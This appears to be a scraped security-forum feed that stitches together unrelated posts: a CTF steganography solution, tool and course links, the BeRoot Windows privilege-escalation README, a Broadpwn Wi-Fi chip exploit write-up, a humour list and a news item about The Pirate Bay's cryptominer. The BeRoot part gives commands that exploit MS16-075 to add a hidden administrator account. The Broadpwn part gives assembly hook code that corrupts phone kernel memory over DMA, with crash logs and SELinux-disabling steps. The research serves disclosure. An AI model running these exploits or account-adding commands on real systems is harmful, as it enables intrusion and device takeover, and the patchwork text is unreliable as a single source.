Leaderboard

Având puțin timp liber seara, am decis să mă destind cu acest challenge. La rugămintea lui @Usr6 în continuare postez rezolvarea problemei. 1. Descărcăm imaginea, verificând ca aceasta să fie integră $ curl -s https://rstforums.com/forum/uploads/monthly_2017_09/OldGarage.jpg.cdab3e6485face558cb330baf13519cf.jpg --output OldGarage.jpg && md5sum OldGarage.jpg 2. Folosind un hex editor, căutăm biții de sfârșit ai jpg-ului, aceștia fiind FF D9. Dacă după acești biți începe analiza noastră. Dacă după acești biți mai există ceva care ne-ar putea da de bănuit, iar în acest caz putem observa un nume de fișier, anume "The_eye_of.jpg". De începem să bănuim că aici vom găsi următoarea sub-problemă. Verificăm dacă la sfârșitul acelui bloc de biți găsim grupul de litere PK (inițialele lui Phil Katz, creatorul formatului zip) 3.1.0 Folosind dd sau un extractor, extragem arhiva din imagine. Îi vom da valoarea parametrului skip valoarea în format decimal a blocului unde se termină jpg-ul (unde am găsit blocul FF D9), în cazul nostru: dd if=OldGarage.jpg bs=1 skip=47168 of=imaginea_din_arhiva.zip 3.1.1 Dezarhivăm imaginea_din_arhiva.zip PS: Am prezentat acest pas pentru a se putea observa cum funcționează lucrurile. 3.2 Probabil aveți un extractor care e destul de deștept și puteți extrage direct: 4. Analizăm imaginea obținută analog cu pasul 3, unde observăm același procedeu, dar, la extragerea arhivei suntem întâmpinați de cererea unei parole. Pentru un rezultat mai obiectiv, căutăm imaginea pe Google împreună cu numele acesteia fără "_". Găsim astfel parola Horus 5. Analog pasului anterior, la dezarhivare trebuie să introducem o parolă pentru a ajunge la următorul sub-challenge: Căutând pe Google după "the code of holy bible" ajungem pe pagina de Wikipedia a acestuia, iar la al doilea paragraf găsim asta: Decidem să spargem textul în bucăți de câte 50 de caractere. Pentru asta, eu am folosit site-ul http://www.dcode.fr/text-splitter care are o mulțime de tool-uri de criptanaliză. Obținem asta: Deci, avem parola: GoodDataIsCryptedData 6. În urma tuturor indiciilor am ajuns să avem fișierul cu numele "Divide ET Impera.56" La prima vedere pare o înșiruire de hash-uri MD5, cel puțin pentru mine. Dar, ca să folosim indiciul, vom împărți textul în 56 de blocuri. Pe fiecare linie avem câte 32 de caractere, ceea ce corespunde unui hash MD5. Deci, să trecem la treabă. Căutăm un site unde putem introduce mai multe hash-uri odată. Eu am găsit https://hashkiller.co.uk/md5-decrypter.aspx Rezultatul este: 92eb5ffee6ae2fec3ad71c777531578f MD5 : b 4b43b0aee35624cd95b910189b3dc231 MD5 : r 0cc175b9c0f1b6a831c399e269772661 MD5 : a 9e3669d19b675bd57058fd4664205d2a MD5 : v d95679752134a2d9eb61dbd7b91c4bcc MD5 : o 5058f1af8388633f609cadb75a75dc9d MD5 : . 7215ee9c7d9dc229d2921a40e899ec5f MD5 : [space] e358efa489f58062f10dd7316b65649e MD5 : t e1671797c52e15f763380b45e841ec32 MD5 : e 336d5ebc5436534e61d16e63ddfca327 MD5 : - 0cc175b9c0f1b6a831c399e269772661 MD5 : a 865c0c0b4ab0e063e5caa3387c1a8741 MD5 : i 7215ee9c7d9dc229d2921a40e899ec5f MD5 : [space] 83878c91171338902e0fe0fb97a8c47a MD5 : p 4b43b0aee35624cd95b910189b3dc231 MD5 : r 865c0c0b4ab0e063e5caa3387c1a8741 MD5 : i 7b8b965ad4bca0e41ab51de7b31363a1 MD5 : n 03c7c0ace395d80182db07ae2c30f034 MD5 : s 5058f1af8388633f609cadb75a75dc9d MD5 : . 7215ee9c7d9dc229d2921a40e899ec5f MD5 : [space] 800618943025315f869e4e1f09471012 MD5 : F e1671797c52e15f763380b45e841ec32 MD5 : e 2db95e8e1a9267b7a1188556b2013b33 MD5 : l 865c0c0b4ab0e063e5caa3387c1a8741 MD5 : i 4a8a08f09d37b73795649038408b5f33 MD5 : c 865c0c0b4ab0e063e5caa3387c1a8741 MD5 : i e358efa489f58062f10dd7316b65649e MD5 : t 0cc175b9c0f1b6a831c399e269772661 MD5 : a 4b43b0aee35624cd95b910189b3dc231 MD5 : r 865c0c0b4ab0e063e5caa3387c1a8741 MD5 : i 9033e0e305f247c0c3c80d0c7848c8b3 MD5 : ! 7215ee9c7d9dc229d2921a40e899ec5f MD5 : [space] 44c29edb103a2872f519ad0c9a0fdaaa MD5 : P 5058f1af8388633f609cadb75a75dc9d MD5 : . 5dbc98dcc983a70728bd082d1a47546e MD5 : S 5058f1af8388633f609cadb75a75dc9d MD5 : . 7215ee9c7d9dc229d2921a40e899ec5f MD5 : [space] d20caec3b48a1eef164cb4ca81ba2587 MD5 : L 0cc175b9c0f1b6a831c399e269772661 MD5 : a 7215ee9c7d9dc229d2921a40e899ec5f MD5 : [space] 69691c7bdcc3ce6d5d8a1361f22d04ac MD5 : M 7b774effe4a349c6dd82ad4f4f21d34c MD5 : u 2db95e8e1a9267b7a1188556b2013b33 MD5 : l e358efa489f58062f10dd7316b65649e MD5 : t 865c0c0b4ab0e063e5caa3387c1a8741 MD5 : i 7215ee9c7d9dc229d2921a40e899ec5f MD5 : [space] 7fc56270e7a70fa81a5935b72eacbe29 MD5 : A 7b8b965ad4bca0e41ab51de7b31363a1 MD5 : n 865c0c0b4ab0e063e5caa3387c1a8741 MD5 : i 7215ee9c7d9dc229d2921a40e899ec5f MD5 : [space] b2f5ff47436671b6e533d8dc3614845d MD5 : g 0cc175b9c0f1b6a831c399e269772661 MD5 : a 4b43b0aee35624cd95b910189b3dc231 MD5 : r 0cc175b9c0f1b6a831c399e269772661 MD5 : a 363b122c528f54df4a0446b6bab05515 MD5 : j e1671797c52e15f763380b45e841ec32 MD5 : e Cam acesta a fost challenge-ul. Mulțumiri @Usr6și la mulți ani cu întârziere @MrGrj, că am uitat :"> Resurse utile: https://ctfs.github.io/resources/topics/steganography/file-in-image/README.html https://gchq.github.io/CyberChef/ http://www.dcode.fr/ http://security.cs.pub.ro/hexcellents/wiki/kb/crypto/home http://ridiculousfish.com/hexfiend/

Description youtube-dl is a command-line program to download videos from YouTube.com and a few more sites. It requires the Python interpreter, version 2.6, 2.7, or 3.2+, and it is not platform specific. It should work on your Unix box, on Windows or on Mac OS X. It is released to the public domain, which means you can modify it, redistribute it or use it however you like. youtube-dl [OPTIONS] URL [URL...] INSTALLATION DESCRIPTION OPTIONS CONFIGURATION OUTPUT TEMPLATE FORMAT SELECTION VIDEO SELECTION FAQ DEVELOPER INSTRUCTIONS EMBEDDING YOUTUBE-DL BUGS COPYRIGHT Download: youtube-dl-master.zip or git clone https://github.com/rg3/youtube-dl.git Source: https://github.com/rg3/youtube-dl

https://kali.training http://vue.com/kali/ https://kali.training/downloads/Kali-Linux-Revealed-1st-edition.pdf

Lecture 1 - Introduction to x86 Assembly Slides Presentation Lecture 2 - Reverse Engineering Machine Code Pt. 1 Slides Presentation Lecture 3 - Reverse Engineering Machine Code Pt. 2 Slides Presentation Lecture 4 - Reverse Engineering Machine Code Pt. 3 Slides Presentation Lecture 5 - Executable File Formats Slides Presentation Lecture 6 - Modern Vulnerability Exploitation: The Stack Overflow Slides Presentation Lecture 7 - Modern Vulnerability Exploitation: The Heap Overflow Slides Presentation Lecture 8 - Modern Vulnerability Exploitation: Shellcoding Slides Presentation Lecture 9 - Modern Vulnerability Exploitation: Format String Attacks Slides Presentation Sursa: https://codebreaker.ltsnet.net/resources

Pentru tine nu:)) pentru cei noi: contine cate un pic din toate, chestii de baza cat sa intelegi despre ce e vorba intr-o discutie infosec, sa stii ce sa cauti pe google daca ai nevoie de help. Daca n-ai avut contact cu programarea inveti sa intelegi/modifici c/python, ce e aia o vulnerabilitate, cum functioneaza un exploit, un xss, cu exemple, explicatii si etc. Mie mi s-a parut destul de ok realizat cursul si il recomand tuturor celor preocupati de domeniul it indiferent daca vor sa-si faca o cariera in infosec sau nu

BeRoot BeRoot(s) is a post exploitation tool to check common Windows misconfigurations to find a way to escalate our privilege. A compiled version is available here. It will be added to the pupy project as a post exploitation module (so it will be executed in memory without touching the disk). Except one method, this tool is only used to detect and not to exploit. If something is found, templates could be used to exploit it. To use it, just create a test.bat file located next to the service / DLL used. It should execute it once called. Depending on the Redistributable Packages installed on the target host, these binaries may not work. Run it |====================================================================| | | | Windows Privilege Escalation | | | | ! BANG BANG ! | | | |====================================================================| usage: beRoot.exe [-h] [-l] [-w] [-c CMD] Windows Privilege Escalation optional arguments: -h, --help show this help message and exit -l, --list list all softwares installed (not run by default) -w, --write write output -c CMD, --cmd CMD cmd to execute for the webclient check (default: whoami) All detection methods are described on the following document. Path containing space without quotes Consider the following file path: C:\Program Files\Some Test\binary.exe If the path contains spaces and no quotes, Windows would try to locate and execute programs in the following order: C:\Program.exe C:\Program Files\Some.exe C:\Program Files\Some Folder\binary.exe Following this example, if "C:\" folder is writable, it would be possible to create a malicious executable binary called "Program.exe". If "binary.exe" run with high privilege, it could be a good way to escalate our privilege. Note: BeRoot realized these checks on every service path, scheduled tasks and startup keys located in HKLM. How to exploit The vulnerable path runs as: a service: create a malicious service (or compile the service template) a classic executable: Create your own executable. Writable directory Consider the following file path: C:\Program Files\Some Test\binary.exe If the root directory of "binary.exe" is writable ("C:\Program Files\Some Test") and run with high privilege, it could be used to elevate our privileges. Note: BeRoot realized these checks on every service path, scheduled tasks and startup keys located in HKLM. How to exploit The service is not running: Replace the legitimate service by our own, restart it or check how it's triggered (at reboot, when another process is started, etc.). The service is running and could not be stopped: Most exploitation will be like that, checks for dll hijacking and try to restart the service using previous technics. Writable directory on %PATH% This technic affects the following Windows version: 6.0 => Windows Vista / Windows Server 2008 6.1 => Windows 7 / Windows Server 2008 R2 6.2 => Windows 8 / Windows Server 2012 On a classic Windows installation, when DLLs are loaded by a binary, Windows would try to locate it using these following steps: - Directory where the binary is located - C:\Windows\System32 - C:\Windows\System - C:\Windows\ - Current directory where the binary has been launched - Directory present in %PATH% environment variable If a directory on the %PATH% variable is writable, it would be possible to realize DLL hijacking attacks. Then, the goal would be to find a service which loads a DLL not present on each of these path. This is the case of the default "IKEEXT" service which loads the inexistant "wlbsctrl.dll". How to exploit: Create a malicious DLL called "wlbsctrl.dll" (use the DLL template) and add it to the writable path listed on the %PATH% variable. Start the service "IKEEXT". To start the IKEEXT service without high privilege, a technic describe on the french magazine MISC 90 explains the following method: Create a file as following: C:\Users\bob\Desktop>type test.txt [IKEEXTPOC] MEDIA=rastapi Port=VPN2-0 Device=Wan Miniport (IKEv2) DEVICE=vpn PhoneNumber=127.0.0.1 Use the "rasdial" binary to start the IKEEXT service. Even if the connection failed, the service should have been started. C:\Users\bob\Desktop>rasdial IKEEXTPOC test test /PHONEBOOK:test.txt MS16-075 For French user, I recommend the article written on the MISC 90 which explain in details how it works. This vulnerability has been corrected by Microsoft with MS16-075, however many servers are still vulnerable to this kind of attack. I have been inspired from the C++ POC available here Here are some explaination (not in details): Start Webclient service (used to connect to some shares) using some magic tricks (using its UUID) Start an HTTP server locally Find a service which will be used to trigger a SYSTEM NTLM hash. Enable file tracing on this service modifying its registry key to point to our webserver (\\127.0.0.1@port\tracing) Start this service Our HTTP Server start a negotiation to get the SYSTEM NTLM hash Use of this hash with SMB to execute our custom payload (SMBrelayx has been modify to realize this action) Clean everything (stop the service, clean the regritry, etc.). How to exploit: BeRoot realize this exploitation, change the "-c" option to execute custom command on the vulnerable host. beRoot.exe -c "net user Zapata LaLuchaSigue /add" beRoot.exe -c "net localgroup Administrators Zapata /add" AlwaysInstallElevated registry key AlwaysInstallElevated is a setting that allows non-privileged users the ability to run Microsoft Windows Installer Package Files (MSI) with elevated (SYSTEM) permissions. To allow it, two registry entries have to be set to 1: HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated How to exploit: create a malicious msi binary and execute it. Unattended Install files This file contains all the configuration settings that were set during the installation process, some of which can include the configuration of local accounts including Administrator accounts. These files are available on these following path: C:\Windows\Panther\Unattend.xml C:\Windows\Panther\Unattended.xml C:\Windows\Panther\Unattend\Unattended.xml C:\Windows\Panther\Unattend\Unattend.xml C:\Windows\System32\Sysprep\unattend.xml C:\Windows\System32\Sysprep\Panther\unattend.xml How to exploit: open the unattend.xml file to check if passwords are present on it. Should looks like: <UserAccounts> <LocalAccounts> <LocalAccount> <Password> <Value>RmFrZVBhc3N3MHJk</Value> <PlainText>false</PlainText> </Password> <Description>Local Administrator</Description> <DisplayName>Administrator</DisplayName> <Group>Administrators</Group> <Name>Administrator</Name> </LocalAccount> </LocalAccounts> </UserAccounts> Other possible misconfigurations Other tests are realized to check if it's possible to: Modify an existing service Create a new service Modify a startup key (on HKLM) Modify directory where all scheduled tasks are stored: "C:\Windows\system32\Tasks" Special thanks Good description of each checks: https://toshellandback.com/2015/11/24/ms-priv-esc/ C++ POC: https://github.com/secruul/SysExec Impacket as always, awesome work: https://github.com/CoreSecurity/impacket/ Author: Alessandro ZANNI zanni.alessandro@gmail.com Download: BeRoot-master.zip or git clone https://github.com/AlessandroZ/BeRoot.git Source: https://github.com/AlessandroZ/BeRoot

Crashing phones with Wi-Fi: Exploiting nitayart's Broadpwn bug (CVE-2017-9417) This is part 2 of a two-part series on Broadpwn: part 1 is here: A cursory analysis of @nitayart's Broadpwn bug (CVE-2017-9417) TLDR: If you're near a malicious Wi-Fi network, an attacker can take over your Wi-Fi chip using @nitayart's Broadpwn bug, and then take over the rest of your phone with Project Zero/@laginimaineb's previously disclosed DMA attack. As a proof of concept, I've made a malicious network which uses these two exploits to corrupt the RAM of my Nexus 6P, causing a crash and reboot. Plan There's two parts to this proof of concept: A method to get arbitrary code execution on the Wi-Fi chip using @nitayart's Broadpwn bug An implementation of Project Zero's DMA engine hook to corrupt the kernel in the main system memory over PCIE The first part is very reliable - I can always get code execution; the second part only works sometimes, since we're pointing the Wi-Fi packet DMA into main memory, and so success depends on what packets are DMAed. Code execution on the Wi-Fi chip In the last post, we managed to cause a heap write out of bounds using the Broadpwn bug, which causes the Wi-Fi chip to crash when reading an invalid address. Here's the crashlog from the previous post: [ 695.399412] CONSOLE: FWID 01-a2412ac4 [ 695.399420] CONSOLE: flags 60040005 [ 695.399425] CONSOLE: 000003.645 [ 695.399430] CONSOLE: TRAP 4(23fc30): pc 5550c, lr 2f697, sp 23fc88, cpsr 2000019f, spsr 200001bf [ 695.399435] CONSOLE: 000003.645 dfsr 1, dfar 41414145 [ 695.399441] CONSOLE: 000003.645 r0 41414141, r1 2, r2 1, r3 0, r4 22cc00, r5 217634, r6 217048 [ 695.399449] CONSOLE: 000003.645 r7 2, r8 56, r9 1, r10 216120, r11 217224, r12 8848cb89 [ 695.399455] CONSOLE: 000003.645 [ 695.399460] CONSOLE: sp+0 00000002 0022cc00 0022d974 00217634 [ 695.399465] CONSOLE: 000003.645 sp+10 00000004 0001aa83 0022d97f 00000168 [ 695.399471] CONSOLE: [ 695.399476] CONSOLE: 000003.645 sp+14 0001aa83 [ 695.399481] CONSOLE: 000003.645 sp+38 000937eb [ 695.399486] CONSOLE: 000003.645 sp+44 00003b15 [ 695.399492] CONSOLE: 000003.645 sp+4c 00088659 [ 695.399497] CONSOLE: 000003.645 sp+64 00008fc7 [ 695.399502] CONSOLE: 000003.645 sp+74 0000379b [ 695.399507] CONSOLE: 000003.645 sp+94 00000a29 [ 695.399512] CONSOLE: 000003.645 sp+c4 0019a9e1 [ 695.399517] CONSOLE: 000003.645 sp+e4 00006a4d [ 695.399523] CONSOLE: 000003.645 sp+11c 00188113 [ 695.399528] CONSOLE: 000003.645 sp+15c 000852ef [ 695.399533] CONSOLE: 000003.645 sp+180 00019735 [ 695.399538] CONSOLE: 000003.645 sp+194 0001ec73 [ 695.399543] CONSOLE: 000003.645 sp+1bc 00018ba5 [ 695.399549] CONSOLE: 000003.645 sp+1dc 00018a75 [ 695.399554] CONSOLE: 000003.645 sp+1fc 0000656b First, let's figure out what exactly we're overwriting. According to Project Zero, heap allocations begin with a 8-byte header: a uint32_t containing the allocation's size and a pointer to the next free chunk if the current chunk is free or null if it's allocated. I connected to a normal Wi-Fi network that uses QoS, and dumped the Wi-Fi chip's RAM using dhdutil. Next, I used a modified version of Project Zero's heap visualization script to iterate through the entire heap, looking for allocations that begin with 0050f202 (the start of a WME information element). It turns out there's two allocations that both begin with this series of bytes: the chunk at 0x1f3550 and at 0x21700c. Both are followed by another chunk 0x78 bytes in size (at 0x1f3584 and 0x217040) Looking at the stack in the crashlog, we can see that r6=0x217048 matches the start of the second allocation, so the address we're overflowing seems to be the second one. Next, what are we overwriting afterwards? Right now, we only know the next chunk's size (0x78) and contents (a few pointers, no function pointers). Let's look at the code that crashed. Going up the call stack, we identified a function that contains a printf call with the function name. After cross referencing, we're able to reconstruct this call stack: 0x5550c wlc_hrt_del_timeout 0x635cc wlc_pm2_sleep_ret_timer_stop 0x2f670 wlc_set_pm_mode 0x19734 _wlc_ioctl So it looks like we overwrote a pointer to a timer, and the firmware crashes when disabling it. This type of timer is placed in a single linked list when enabled. A timer looks like this: typedef struct wlc_hrt_to { wlc_hrt_to_t *next; // 0x0 list_head *hrti; // 0x4 uint32_t timeout; // 0x8 void *func; // 0xc } wlc_hrt_to_t; So when disabling a timer, wlc_hrt_del_timeout performs the following: Check if the passed in pointer to the timer is null; if so, return Grab the pointer to the head of the list from the timer Iterate through the list until it finds the timer to disable Once it finds it, add the remaining time on the timer to the next timer in the sequence Perform standard singly-linked list unlink (prev->next = this->next) Finally set the function pointer on the timer to null So how can we turn this into a write primitive? Abuse the timeout addition! Make a fake timer object set the pointer to head of the list to a fake linked list head This fake linked list head points to the fake timer object Set the next pointer on this fake timer object to point to the code we want to overwrite Set the remaining time on this fake object to be (target value - current value at the address we want to overwrite) We also overlap the timer's function pointer with the link list head's next pointer And so, when the firmware attempts to disable this fake timer, it: Finds our timer object - it's the first timer in the fake linked list Adds the remaining time to the next timer in the list - which is pointing to the code we want to overwrite, giving us a write. Does the unlink by setting prev->next (which is the head of the list right now) to this->next And zeros out the function pointer. Since we overlapped the fake timer with the fake linked list head, this also zeroes the list head's ->next pointer, so any future attempts to disable this timer will fail gracefully when it sees an empty linked list, preventing crashes. I decided to use this to change the first instruction of dma64_txfast to a branch instruction that jumps into our overflowed buffer, allowing arbitrary code execution on the Wi-Fi chip. There's a few other things to take care of: setting the other pointers in the overwritten structure to null to prevent crashes when the firmware tries to access them filling the beginning of the overflowed structure with 0x41 to cause the firmware to disable the fake timer (For some reason, if I set it all to 0x00, the fake timer is never disabled. I don't know why.) making sure the firmware doesn't overwrite our payload (I made a payload with 0x41s, connected to the network, dumped the RAM to see which bytes were overwritten, and put code and structures into the intact areas) but after that, we have code execution! The payload can be seen here, with comments on the purpose of each part. Now, what to execute? Crashing the main CPU Let's implement Project Zero's DMA attack. The TLDR of their approach is that recent phones connect Wi-Fi chipsets via PCI Express, which allows arbitrary memory writes and reads through DMA. By manipulating the list of DMA buffers on the Wi-Fi chip, an attacker can write any information into main memory, thus getting code execution on the main CPU. I'm using Project Zero's first DMA attack, which simply sets the D2H_MSGRING_TX_COMPLETE ring's ringaddr to point into the kernel. I dumped the address of the ring structure using Project Zero's dump_pci.py script, and then wrote a hook that patches the target address to 0x248488 in the main CPU's physical memory (which seems to correspond to critical code in the kernel I'm running), and also patches out the WME IE bug that we exploited in the first place (so that we don't accidentally run the exploit twice). Here's the hook: .syntax unified .thumb hook_entry: // 0x90 push {r0-r3,r4-r9,lr} // 0x217090 bl fullhook // 0x217094 pop {r0-r3} // 0x217098 .word 0xbaf9f774 // 0x21709a: branch to original txfast fullhook: ldr r3, patchoutaddr // 0x21709e ldr r2, patchaddr // 0x2170a0 str r2, [r3] // 0x2180a2 ldr r2, ringaddr // 0x2180a4 ldr r3, valuewritten // 0x2180a6 str r3, [r2] // 0x2180a8 bx lr // 0x2180aa valuewritten: .word 0x00248488 // 0x2180ac physical address on the host side; seems to crash things... patchoutaddr: .word 0x1b8ad0 // 0x2180b0 function to patch patchaddr: .word 0x47702000 // 0x2180b4 mov r0, #0; bx lr note firmware overwrites byte 0 with a 0; it's fine ringaddr: .word 0x002397C4 // 0x2180b8 ringaddr of D2H_MSGRING_TX_COMPLETE dumped with Project Zero's dump_pci.py This is then assembled and placed into the payload. The next time dma64_txfast is called, our code will patch the DMA ring, and the next Wi-Fi packet to be processed will overwrite part of the main CPU's kernel, crashing it. The final payload can be seen here, along with other useful scripts. Result Experimental setup: computer same as before (Ubuntu 14.04, hostapd 2.6, Intel 7260 integrated Wi-Fi). Phone same as before: Google/Huawei Nexus 6P: running the latest firmware (N2G48B), but modified with the vulnerable June Broadcom firmware for testing this bug, and with a custom kernel for rooting. Since the bug is in the Wi-Fi firmware only, this should give the same result as an unupdated stock Nexus 6P. When the device connects to the network, it froze, and then after a few seconds it rebooted. The console-ramoops file (which contains the kernel log from the previous boot) shows a kernel panic from an invalid instruction exception in the kernel. (I tried to overwrite sys_nanosleep, but missed. It seemed to break something at least.) The crash isn't very reliable (the code exec on the wi-fi chip seems to be reliable, but getting the PCIE DMA to cooperate isn't.) When it works, the crash log shows this: [ 5887.413947] CFG80211-ERROR) wl_cfg80211_connect : Connecting to (MAC address) with channel (1) ssid (Network) [ 5887.420050] CFG80211-ERROR) wl_notify_connect_status : connect failed event=0 e->status 4 e->reason 1 [ 5887.426601] CFG80211-ERROR) wl_bss_connect_done : Report connect result - connection failed [ 5887.474993] WLDEV-ERROR) wldev_set_country : wldev_set_country: set country for CA as US rev 975 [ 5887.596971] type=1400 audit(1499840123.620:282): avc: denied { syslog_read } for pid=14628 comm="WifiStateMachin" scontext=u:r:system_server:s0 tcontext=u: r:kernel:s0 tclass=system permissive=1 [ 5887.642896] dhd_dbg_monitor_get_tx_pkts(): no tx_status in tx completion messages, make sure that 'd11status' is enabled in firmware, status_pos=0 [ 5887.810772] HTB: quantum of class 10001 is big. Consider r2q change. [ 5887.829826] HTB: quantum of class 10010 is big. Consider r2q change. [ 5889.614299] Internal error: Oops - undefined instruction: 0 [#1] PREEMPT SMP [ 5889.614322] CPU: 0 PID: 23518 Comm: kworker/0:1 Tainted: G W 3.10.73-g4f6d61a-00391-gde1f200-dirty #38 [ 5889.614339] Workqueue: events rslow_comp_work [ 5889.614350] task: ffffffc0812d8ac0 ti: ffffffc08d134000 task.ti: ffffffc08d134000 [ 5889.614358] PC is at fg_mem_write+0x3f0/0x4dc [ 5889.614364] LR is at fg_mem_write+0x3f0/0x4dc [ 5889.614370] pc : [<ffffffc0008b8480>] lr : [<ffffffc0008b8480>] pstate: 60000145 [ 5889.614374] sp : ffffffc08d137b80 [ 5889.614379] x29: ffffffc08d137b80 x28: ffffffc0bec2f2c8 [ 5889.614388] x27: ffffffc08d137bfe x26: ffffffc08d137c0f [ 5889.614396] x25: ffffffc08d137c10 x24: 0000000000000000 [ 5889.614405] x23: ffffffc08d137cc4 x22: 0000000000000000 [ 5889.614413] x21: 0000000000000004 x20: 0000000000000001 [ 5889.614421] x19: ffffffc0bec2f018 x18: 0000000000000000 [ 5889.614429] x17: 0000000000000000 x16: ffffffc00034f1bc [ 5889.614438] x15: 0000000000000000 x14: 0ffffffffffffffe [ 5889.614446] x13: 0000000000000030 x12: 0101010101010101 [ 5889.614454] x11: 7f7f7f7f7f7f7f7f x10: 0000000000004410 [ 5889.614462] x9 : ffffffc006158018 x8 : ffffffc00168e300 [ 5889.614471] x7 : 0000000000000818 x6 : 0000000000000000 [ 5889.614479] x5 : 0000000000000818 x4 : 00000000fc4cf000 [ 5889.614487] x3 : 0000000000000001 x2 : 09104ccfa95a13c2 [ 5889.614495] x1 : 09104ccfa95a13c2 x0 : 0000000000000000 (snip a few lines) [ 5889.615088] Process kworker/0:1 (pid: 23518, stack limit = 0xffffffc08d134058) [ 5889.615093] Call trace: [ 5889.615100] [<ffffffc0008b8480>] fg_mem_write+0x3f0/0x4dc [ 5889.615106] [<ffffffc0008b8a38>] fg_mem_masked_write+0x114/0x178 [ 5889.615113] [<ffffffc0008ba598>] rslow_comp_work+0x238/0x364 [ 5889.615123] [<ffffffc00023d224>] process_one_work+0x25c/0x3c0 [ 5889.615129] [<ffffffc00023d580>] worker_thread+0x1f8/0x348 [ 5889.615139] [<ffffffc000243e70>] kthread+0xc0/0xcc [ 5889.615147] Code: f9400660 52800023 11004042 97fff7bc (000103e2) [ 5889.615153] ---[ end trace 48638eec16f50d72 ]--- [ 5889.628687] Kernel panic - not syncing: Fatal exception [ 5889.628851] CPU1: stopping Impact Yep, we've proved Broadpwn to be exploitable. In addition, the heap buffers that are overflowed are allocated at startup, so they are stable for a given firmware version and chip. So if attackers knows your device and your firmware version, they can take over the Wi-Fi chip and then the whole phone. I think @Viss has the best advice: just turn Wi-Fi off. Stuff I don't know how to do There's a few issues that prevents this proof-of-concept from being useful. Project Zero's proof of concept, implemented here, DMAs random network packets into main memory; I was unable to implement their more advanced dma64_txfast hook (which gives more control over the address to write. It worked once, and only once, and I can't reproduce it.) can we control what's written so that we can modify the kernel instead of just corrupting and crashing it? Currently, the Wi-Fi stops working if I trigger the bug, even if I use a payload that doesn't crash the device or the Wi-Fi chip. It just fails to finish connecting to network. An attacker will need to keep the Wi-Fi working to avoid user suspicion and to exfiltrate data. Current payload requires address of buffer that's overflowed + address of dma64_txfast, both of which differs between phones and firmware versions. Is it possible to develop an exploit that works on all devices? @nitayart's Black Hat presentation is likely to cover some of these, so don't miss it. Appendix: testing with a different version of firmware I have my phone updated to the latest version of Android, so when I need to test this bug, I need to downgrade the Broadcom firmware. Here's how: $ adb shell # setenforce 0 # cp fw_bcmdhd.bin /data/local/tmp/firmware/ # chmod 755 /data/local/tmp/firmware/fw_bcmdhd.bin # mount -o bind /data/local/tmp/firmware /vendor/firmware # stop # start Sursa: http://boosterok.com/blog/broadpwn2/

17 tips you should know before dating a Hacker People don't ship with user manuals, same applies to the other type: `The Security Phreaks`. Whether you dated on purpose or by mistake the `security girl `or `security guy` (a.k.a. InfoSec, Information Security, IT Security or simply a Hacker), here are some instructions that might be helpful to tweak and maintain a sustainable, fruitful relationship full of joy, happiness and those shits. If you are into security stuff, the below will help you understand yourself more. Grey is a bad color, it's either they trust you or they don't. Perfect your 1st impression and the last one. Never interrupt them while coding, by this you will violate point #1 in terms of `bad last impression`. Those people are mentally ill Xor bad at their jobs. Don't lie. Those creatures have highly sensitive lie-dars and there to haunt you. In case you managed to keep a lie, they will praise your special powers and will love you forever. They might not answer your call, don't take it personal. Just call back the day after. If you miss your hacker due to some circumstances, get a web cam and play it cyber. Expect waking up after late night text messages. Answer immediately! Your availability is required upon need! Do not expect birthday gifts such as roses, cute hearts and diamond - Expect something useful. For Gods' sake, do not clean up their computer desks. Dust are part of the room's ecosystem. Being invited to technical events and security cons is not a date. Proving them wrong arouses them disregarding your gender. Through inherent nature they like to disassemble stuff and reassemble them. They might disassemble your heart, but RMV (Results might vary) among all extremes. Mostly applied to 1st dates, they might know more secrets about you; don't panic - background checks and social engineering are hackers' bestest hobby. They'll port-scan you for informational purposes. Don't show your vulnerabilities, they'll enjoy discovering them by themselves and will be glad helping you remediate them. A Backdoor might be a solution. Don't ask for their knowledge in Facebook and SMS hacking; if they do, strategically speaking, you'll be the last to inform. You might see them leading Viking wars while `speaking` security. Keep calm, relax, nothing is serious, show that you care. They will notice you understand no shit of their talks, but will appreciate all your interest attempts. Subscribe to 3G/4G : don't join their home networks. Don't trust any network they are connected to. Don't provide them with your home Wi-Fi password, they will not like at first it but will appreciate your security awareness level. On the bright side, they'll accept the challenge. Don't hand them your phone, even for the minimal duration and reasons - you will regret it someday somehow. In the end, your hacker conceives you as computer with a soul, we are all human after all; I hope you make use of my tips and enjoy your holes securely investigated ever after. Thank you for reading this post, please do not hesitate to update me with your feedback, comments and testimonials. Sursa: https://moophz.com/article/17-tips-you-should-know-dating-security-guy-or-girl

mu(e) online ?

A few hours ago a cryptocurrency miner appeared on The Pirate Bay website, using the computer resources of visitors to mine Monero coins. The operators of The Pirate Bay are testing it as a new way to generate revenue, but many users aren't happy. Four years ago many popular torrent sites added an option to donate via Bitcoin. The Pirate Bay was one of the first to jump on board and still lists its address on the website. While there’s nothing wrong with using Bitcoin as a donation tool, adding a Javascript cryptocurrency miner to a site is of a totally different order. A few hours ago many Pirate Bay users began noticing that their CPU usage increased dramatically when they browsed certain Pirate Bay pages. Upon closer inspection, this spike appears to have been caused by a Bitcoin miner embedded on the site. The code in question is tucked away in the site’s footer and uses a miner provided by Coinhive. This service offers site owners the option to convert the CPU power of users into Monero coins. The miner does indeed appear to increase CPU usage quite a bit. It is throttled at different rates (we’ve seen both 0.6 and 0.8) but the increase in resources is immediately noticeable. The miner is not enabled site-wide. When we checked, it appeared in the search results and category listings, but not on the homepage or individual torrent pages. There has been no official comment from the site operators on the issue (update, see below), but many users have complained about it. In the official site forums, TPB supermoderator Sid is clearly not in agreement with the site’s latest addition. “That really is serious, so hopefully we can get some action on it quickly. And perhaps get some attention for the uploading and commenting bugs while they’re at it,” Sid writes. Like many others, he also points out that blocking or disabling Javascript can stop the automatic mining. This can be done via browser settings or through script blocker addons such as NoScript and ScriptBlock. Alternatively, people can block the miner URL with an ad-blocker. Whether the miner is a new and permanent tool, or perhaps triggered by an advertiser, is unknown at the point. When we hear more this article will be updated accordingly. Update: We were told that the miner is being tested for a short period (~24 hours) as a new way to generate revenue. This could eventually replace the ads on the site. More info may be revealed later. Sursa: https://torrentfreak.com/the-pirate-bay-website-runs-a-cryptocurrency-miner-170916/

